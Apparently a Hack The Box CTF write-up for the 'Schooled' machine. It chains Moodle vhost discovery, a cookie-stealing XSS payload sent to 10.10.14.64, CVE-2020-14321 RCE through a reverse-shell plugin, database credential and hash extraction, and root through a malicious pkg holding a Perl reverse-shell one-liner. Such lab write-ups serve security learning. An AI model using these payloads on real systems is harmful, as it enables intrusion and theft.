I"÷9<h1 id="main-points">Main points</h1>
<ul>
  <li>vhosts with gobuster</li>
  <li>XSS to steal teacher cookie</li>
  <li>Moodle RCE ver3.9 CVE-2020-14321
    <h1 id="enumeration">Enumeration</h1>
    <p>We start with nmap scan</p>
  </li>
  <li>22/tcp    open     ssh     syn-ack     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)</li>
  <li>80/tcp    open     http    syn-ack     Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)</li>
  <li>33060/tcp open     mysqlx? syn-ack</li>
</ul>

<p>Let‚Äôs check the website
In the <code class="language-plaintext highlighter-rouge">/about.html</code> page, we see that they use Moodle for teaching
<img src="/assets/Pasted%20image%2020210727203524.png" alt="Pasted image 20210727203524.png" /></p>

<p>So there is probably a moodle subdomain, something like <code class="language-plaintext highlighter-rouge">moodle.schooled.htb</code> or <code class="language-plaintext highlighter-rouge">moodle-app.schooled.htb</code> let‚Äôs bruteforce with <code class="language-plaintext highlighter-rouge">gobuster</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gobuster vhost <span class="nt">--url</span> http://schooled.htb <span class="nt">--wordlist</span> /usr/share/wordlists/SecLists/DNS/subdomains-top1million-5000.txt
</code></pre></div></div>

<p>We found moodle subdomain <code class="language-plaintext highlighter-rouge">moodle.schooled.htb</code>
<img src="/assets/Pasted%20image%2020210727204456.png" alt="Pasted image 20210727204456.png" /></p>

<p>Let‚Äôs create an account (in the email, they only accept from domain <code class="language-plaintext highlighter-rouge">student.schooled.htb</code>)</p>

<p><img src="/assets/Pasted%20image%2020210727205316.png" alt="Pasted image 20210727205316.png" /></p>

<p>We enroll to the Math course and we see there is an Announcement
<img src="/assets/Pasted%20image%2020210727211040.png" alt="Pasted image 20210727211040.png" />
Let‚Äôs check the reminder
<img src="/assets/Pasted%20image%2020210727211055.png" alt="Pasted image 20210727211055.png" />
<img src="/assets/Pasted%20image%2020210727211107.png" alt="Pasted image 20210727211107.png" /></p>

<p>So we need to find this MoodleNet profile, and since the teacher will check all the profiles, we can steal his cookies and get a teacher account.</p>

<p>We go to our profile and edit the profile
<img src="/assets/Pasted%20image%2020210728001605.png" alt="Pasted image 20210728001605.png" /></p>

<p><img src="/assets/Pasted%20image%2020210728001622.png" alt="Pasted image 20210728001622.png" /></p>

<p>We can see the <code class="language-plaintext highlighter-rouge">MoodleNet profile</code> field that the teacher will check, let‚Äôs try and put an XSS payload.
<code class="language-plaintext highlighter-rouge">&lt;img src=x onerror=document.location='http://10.10.14.64/?'+document.cookie;&gt;</code>
Setup a python HTTP server and wait for the request, unrenrol and enroll again to the course to make the teacher check your MoodleNet Profile
<img src="/assets/Pasted%20image%2020210728003101.png" alt="Pasted image 20210728003101.png" /></p>

<p>look at me, I am the teacher now
We copy the cookie and replace it in the browser devtool
<img src="/assets/Pasted%20image%2020210728003212.png" alt="Pasted image 20210728003212.png" />
We go the main page
We are the teacher manuel philips
<img src="/assets/Pasted%20image%2020210728003326.png" alt="Pasted image 20210728003326.png" /></p>

<p>Scroll down
<img src="/assets/Pasted%20image%2020210728003723.png" alt="Pasted image 20210728003723.png" />
This redirects to the URL <code class="language-plaintext highlighter-rouge">https://docs.moodle.org/39/en/course/view/topics</code>
Which means this moodle version si <code class="language-plaintext highlighter-rouge">3.9</code>, let‚Äôs look for vulnerabilities for it.</p>

<p>We find a moodle RCE as <code class="language-plaintext highlighter-rouge">CVE-2020-14321</code> according to <a href="https://book.hacktricks.xyz/pentesting/pentesting-web/moodle#rce">Hacktricks</a> we will need to escalate to Manager role to allow ourself to install plugin and install our php revshell as plugin
We find this PoC video</p>
<iframe src="https://player.vimeo.com/video/441698193" width="640" height="380" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen=""></iframe>

<p>Let‚Äôs do the same, we start burp suite, and try to assign Manager role to the user student <code class="language-plaintext highlighter-rouge">Yamanak tameguchi</code> (our created user)</p>

<p><img src="/assets/Pasted%20image%2020210728012730.png" alt="Pasted image 20210728012730.png" />
Make sure to change these
<img src="/assets/Pasted%20image%2020210728013039.png" alt="Pasted image 20210728013039.png" />
<code class="language-plaintext highlighter-rouge">userlist%5B%5D=&lt;YOUR USER ID OF MANUEL PHILIPS&gt;&amp;roletoassign=1</code></p>

<p>And our user is Manager
<img src="/assets/Pasted%20image%2020210728013128.png" alt="Pasted image 20210728013128.png" /></p>

<p>We go to his profile and scroll down and click ‚ÄúLogin as‚Äù
Now we are logged with Manager role
<img src="/assets/Pasted%20image%2020210728013303.png" alt="Pasted image 20210728013303.png" /></p>

<p>And we have site administration
<img src="/assets/Pasted%20image%2020210728020100.png" alt="Pasted image 20210728020100.png" /></p>

<p>Edit the Manager role and catch the request in burp suite, and replace the payload with the one in the github <a href="https://github.com/HoangKien1020/CVE-2020-14321#payload-to-full-permissions">repo</a> to get full permission as manager</p>

<p>From the repo download the zip, extract it, and replace the php file with the revshell from Pentestmonkey, and zip it again.</p>

<p>Now go to install plugin 
<img src="/assets/Pasted%20image%2020210728020811.png" alt="Pasted image 20210728020811.png" /></p>

<p>And upload your zip file
<img src="/assets/Pasted%20image%2020210728020953.png" alt="Pasted image 20210728020953.png" />
And install it</p>

<p>Setup a netcat listener
<img src="/assets/Pasted%20image%2020210728021005.png" alt="Pasted image 20210728021005.png" /></p>

<p>And go to <code class="language-plaintext highlighter-rouge">http://moodle.schooled.htb/blocks/rce/lang/en/block_rce.php</code></p>

<p>And we have a shell
<img src="/assets/Pasted%20image%2020210728021421.png" alt="Pasted image 20210728021421.png" /></p>

<p>After a bit of looking around we find 2 users in <code class="language-plaintext highlighter-rouge">/etc/passwd</code> <code class="language-plaintext highlighter-rouge">jamie</code> and <code class="language-plaintext highlighter-rouge">steve</code>
Let‚Äôs find <code class="language-plaintext highlighter-rouge">config.php</code> files to see if we can grab some creds</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>find / <span class="nt">-iname</span> <span class="s2">"config.php"</span> 2&gt; /dev/null
</code></pre></div></div>

<p><img src="/assets/Pasted%20image%2020210728023534.png" alt="Pasted image 20210728023534.png" /></p>

<p>Let‚Äôs check
<code class="language-plaintext highlighter-rouge">/usr/local/www/apache24/data/moodle/config.php</code></p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>  <span class="c1">// Moodle configuration file</span>

<span class="nb">unset</span><span class="p">(</span><span class="nv">$CFG</span><span class="p">);</span>
<span class="k">global</span> <span class="nv">$CFG</span><span class="p">;</span>
<span class="nv">$CFG</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">stdClass</span><span class="p">();</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dbtype</span>    <span class="o">=</span> <span class="s1">'mysqli'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dblibrary</span> <span class="o">=</span> <span class="s1">'native'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dbhost</span>    <span class="o">=</span> <span class="s1">'localhost'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dbname</span>    <span class="o">=</span> <span class="s1">'moodle'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dbuser</span>    <span class="o">=</span> <span class="s1">'moodle'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dbpass</span>    <span class="o">=</span> <span class="s1">'PlaybookMaster2020'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">prefix</span>    <span class="o">=</span> <span class="s1">'mdl_'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dboptions</span> <span class="o">=</span> <span class="k">array</span> <span class="p">(</span>
  <span class="s1">'dbpersist'</span> <span class="o">=&gt;</span> <span class="mi">0</span><span class="p">,</span>
  <span class="s1">'dbport'</span> <span class="o">=&gt;</span> <span class="mi">3306</span><span class="p">,</span>
  <span class="s1">'dbsocket'</span> <span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
  <span class="s1">'dbcollation'</span> <span class="o">=&gt;</span> <span class="s1">'utf8_unicode_ci'</span><span class="p">,</span>
<span class="p">);</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">wwwroot</span>   <span class="o">=</span> <span class="s1">'http://moodle.schooled.htb/moodle'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">dataroot</span>  <span class="o">=</span> <span class="s1">'/usr/local/www/apache24/moodledata'</span><span class="p">;</span>
<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">admin</span>     <span class="o">=</span> <span class="s1">'admin'</span><span class="p">;</span>

<span class="nv">$CFG</span><span class="o">-&gt;</span><span class="n">directorypermissions</span> <span class="o">=</span> <span class="mo">0777</span><span class="p">;</span>

<span class="k">require_once</span><span class="p">(</span><span class="k">__DIR__</span> <span class="mf">.</span> <span class="s1">'/lib/setup.php'</span><span class="p">);</span>

<span class="c1">// There is no php closing tag in this file,</span>
<span class="c1">// it is intentional because it prevents trailing whitespace problems!</span>
</code></pre></div></div>

<p>So now we have database MySQL creds
<code class="language-plaintext highlighter-rouge">moodle: PlaybookMaster2020</code>
Let‚Äôs connect with <code class="language-plaintext highlighter-rouge">mysql</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/local/bin/mysql <span class="nt">-u</span> moodle <span class="nt">-pPlaybookMaster2020</span>
</code></pre></div></div>
<p>Let‚Äôs see the tables of the database
<img src="/assets/Pasted%20image%2020210728024138.png" alt="Pasted image 20210728024138.png" /></p>

<p>From the table we see table <code class="language-plaintext highlighter-rouge">mdl_user</code> let‚Äôs check the content</p>
<pre><code class="language-SQL">select * from mdl_user;
</code></pre>

<p>We have a lot of data, but we can see there is user and hash, let‚Äôs take the hash of <code class="language-plaintext highlighter-rouge">steve</code> or <code class="language-plaintext highlighter-rouge">jamie</code>, whatever we find ^^
(I couldnt get full output so I used this command)</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/local/bin/mysql <span class="nt">-u</span> moodle <span class="nt">-pPlaybookMaster2020</span> <span class="nt">-e</span> <span class="s2">"use moodle; select * from mdl_user;"</span> | <span class="nb">grep </span>jamie
</code></pre></div></div>
<p>We have the hash of jamie
<code class="language-plaintext highlighter-rouge">$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW</code>
Let‚Äôs crack it with john</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john <span class="nb">hash</span> <span class="nt">-w</span> /usr/share/wordlists/rockyou.txt <span class="nt">--format</span><span class="o">=</span>bcrypt
</code></pre></div></div>

<p>We have password of <code class="language-plaintext highlighter-rouge">jamie:!QAZ2wsx</code> 
We can ssh to it, and we have user flag</p>

<h1 id="priv-esc">Priv Esc</h1>
<p>When we do <code class="language-plaintext highlighter-rouge">sudo -l</code> we see
<img src="/assets/Pasted%20image%2020210728030207.png" alt="Pasted image 20210728030207.png" />
So we can install/update a package, so naturally we should try to make a malicious package and install it using <code class="language-plaintext highlighter-rouge">sudo</code></p>

<p>We see on <a href="https://gtfobins.github.io/gtfobins/pkg/">GTFOBins</a> that we can use <code class="language-plaintext highlighter-rouge">fpm</code> to compile a malicious package, let‚Äôs create a reverse shell that will get us root</p>

<p>On your machine</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TF=$(mktemp -d)
echo perl "-e" "'"'use Socket;$i="10.10.14.64";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'"'" &gt; $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
</code></pre></div></div>
<p>Download it on victim machine using <code class="language-plaintext highlighter-rouge">wget</code> or <code class="language-plaintext highlighter-rouge">curl</code> while setting your python HTTP Server.
Setup your netcat listener</p>

<p>On victim machine</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo pkg install -y --no-repo-update ./x-1.0.txz
</code></pre></div></div>
<p>And we have root on our netcat listener
<img src="/assets/Pasted%20image%2020210728142434.png" alt="Pasted image 20210728142434.png" /></p>

<p>And we have the flag</p>

<h2 id="root-hash">Root hash</h2>
<p><code class="language-plaintext highlighter-rouge">$6$aHA/oB17Vb9TqNGn$GKTw/EWJfAl05/knP2YNId6xbyaAiGh.pfkeD5X/VQa/WtgI7jy5B7yO8Pvvyl1g3sbPATF3Mnn58sjXJgYAS0</code></p>
:ET